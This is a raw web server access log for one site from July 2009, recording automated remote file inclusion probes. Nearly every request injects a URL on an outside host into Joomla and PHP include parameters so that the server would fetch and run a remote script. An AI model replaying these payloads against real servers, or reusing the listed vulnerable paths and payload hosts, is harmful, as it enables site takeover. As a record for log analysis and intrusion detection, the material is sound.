211.230.156.161 - - [04/Jul/2009:23:25:16 -0700] "GET /logs/access.log//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:26:59 -0700] "GET /logs/scripts.log//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:27:26 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:27:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:27:26 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:29:04 -0700] "GET /logs/scripts.log//components/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:29:48 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:29:48 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:29:48 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:23:32:20 -0700] "GET /logs/access.log%20%20///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:23:32:24 -0700] "GET /logs/access.log%20%20///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:34:51 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:34:51 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:23:34:51 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
222.231.1.215 - - [04/Jul/2009:23:38:46 -0700] "GET /logs/access_090521.log////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
222.231.1.215 - - [04/Jul/2009:23:38:46 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.hellionindustries.com"
222.231.1.215 - - [04/Jul/2009:23:38:46 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 1517 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:39:36 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:39:36 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:39:37 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:40:17 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:40:17 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:40:17 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:40:39 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:40:39 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:40:39 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:23:43:46 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:23:43:46 -0700] "GET /include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:23:43:46 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:23:45:23 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:47:54 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:47:59 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [04/Jul/2009:23:48:20 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
219.94.163.199 - - [04/Jul/2009:23:50:04 -0700] "GET /logs/access.log/foro.php?include=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.hellionindustries.com"
219.94.163.199 - - [04/Jul/2009:23:50:04 -0700] "GET /logs/foro.php?include=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.hellionindustries.com"
219.94.163.199 - - [04/Jul/2009:23:50:05 -0700] "GET /foro.php?include=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:23:51:30 -0700] "GET /http://www.kbiguni.org/bbs//data/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:23:56:47 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:23:56:47 -0700] "GET /include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:23:56:47 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:23:58:42 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.115.213.35 - - [05/Jul/2009:00:01:53 -0700] "GET /include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.115.213.35 - - [05/Jul/2009:00:01:53 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.115.213.35 - - [05/Jul/2009:00:01:54 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [05/Jul/2009:00:01:59 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload/www.comfycouch.ca/guest_book/public/index.php?option=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [05/Jul/2009:00:01:59 -0700] "GET /components/com_simpleboard/image_upload/www.comfycouch.ca/guest_book/public/index.php?option=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [05/Jul/2009:00:02:00 -0700] "GET /logs//components/com_simpleboard/image_upload/www.comfycouch.ca/guest_book/public/index.php?option=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
114.200.199.144 - - [05/Jul/2009:00:05:51 -0700] "GET /logs//components/com_simpleboard/image_upload/www.comfycouch.ca/guest_book/public/index.php?option=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
114.200.199.144 - - [05/Jul/2009:00:05:51 -0700] "GET /components/com_simpleboard/image_upload/www.comfycouch.ca/guest_book/public/index.php?option=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
114.200.199.144 - - [05/Jul/2009:00:05:51 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload/www.comfycouch.ca/guest_book/public/index.php?option=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:09:42 -0700] "GET /include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:09:42 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:09:42 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:09:54 -0700] "GET /include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:09:55 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:09:55 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
114.200.199.144 - - [05/Jul/2009:00:11:46 -0700] "GET /logs/scripts.log%20%20//components/com_simpleboard/image_upload/www.comfycouch.ca/guest_book/public/index.php?option=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.251 - - [05/Jul/2009:00:11:51 -0700] "GET /index1.php?menu=http://www.obmana-net.ru/includes/wuzgisid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
66.11.230.251 - - [05/Jul/2009:00:11:51 -0700] "GET /logs/access.log/index1.php?menu=http://www.obmana-net.ru/includes/wuzgisid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
66.11.230.251 - - [05/Jul/2009:00:11:51 -0700] "GET /logs/index1.php?menu=http://www.obmana-net.ru/includes/wuzgisid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:13:05 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:13:05 -0700] "GET /include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:13:05 -0700] "GET /include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:13:05 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:13:06 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:13:06 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:15:16 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au//config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:15:16 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au//config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:15:16 -0700] "GET /logs/access.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au//config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
210.109.103.174 - - [05/Jul/2009:00:16:08 -0700] "GET /logs/http://www.kbiguni.org/bbs//data/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.109.103.174 - - [05/Jul/2009:00:16:08 -0700] "GET /http://www.kbiguni.org/bbs//data/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:16:19 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:16:19 -0700] "GET /logs/access.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:16:19 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:16:46 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:16:47 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:16:52 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "hellionindustries.com"
114.200.199.144 - - [05/Jul/2009:00:16:52 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload/www.comfycouch.ca/guest_book/public/index.php?option=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:18:49 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:18:49 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:18:49 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "hellionindustries.com"
114.200.199.144 - - [05/Jul/2009:00:18:56 -0700] "GET /logs/scripts.log//components/com_simpleboard/image_upload/www.comfycouch.ca/guest_book/public/index.php?option=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
210.109.103.174 - - [05/Jul/2009:00:19:03 -0700] "GET /logs/access.log/http://www.kbiguni.org/bbs//data/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
210.109.103.174 - - [05/Jul/2009:00:19:04 -0700] "GET /http://www.kbiguni.org/bbs//data/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
210.109.103.174 - - [05/Jul/2009:00:19:04 -0700] "GET /logs/http://www.kbiguni.org/bbs//data/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:00:19:06 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:00:19:06 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:00:19:09 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:00:19:26 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:00:19:30 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:00:19:30 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:19:42 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au//config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.108.123.96 - - [05/Jul/2009:00:19:58 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://landpropertygroup.com.au/config/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:21:00 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:21:00 -0700] "GET /Neos_Chronos/header.php?base_folder=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:21:00 -0700] "GET /Neos_Chronos/header.php?base_folder=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:21:00 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:21:00 -0700] "GET /logs/access.log%20%20//Neos_Chronos/header.php?base_folder=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:21:00 -0700] "GET /logs/access.log%20%20//Neos_Chronos/header.php?base_folder=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:22:37 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:24:32 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.38.136.251 - - [05/Jul/2009:00:26:27 -0700] "GET /include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.38.136.251 - - [05/Jul/2009:00:26:27 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.38.136.251 - - [05/Jul/2009:00:26:28 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:28:14 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:00:28:38 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
